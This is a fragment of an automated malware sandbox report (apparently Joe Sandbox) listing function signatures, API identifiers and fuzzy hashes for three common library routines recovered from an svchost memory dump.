                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: ccb3a4b7a4fba413b5e65f448ec0866b918ddff2e22582deebb6145b74459c80
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: E241C272725A8282EB60CF25E8543FAB7A0F798794F904035EE4D877A8EB3CC542C741
                                                        Function 000001F2BD1694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: cb6d49408d700bcf134649fa86f529afd346d8d8b9871fd5f6248b902500e69f
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 7C113D36224B8282EB618F15F4503A977E5F788B94F984221EE8C07769EF3CC555CB00
                                                        Function 000001F2BD161BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 635b24736c22289d5cd47bd1db9a86048c3af2eb6c7f5d055bcc5ee3b73e71c1
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: EB116A79621B4685EB44DB66A8282F977A1FB89FD0F984038DE4D43766DF38C8829301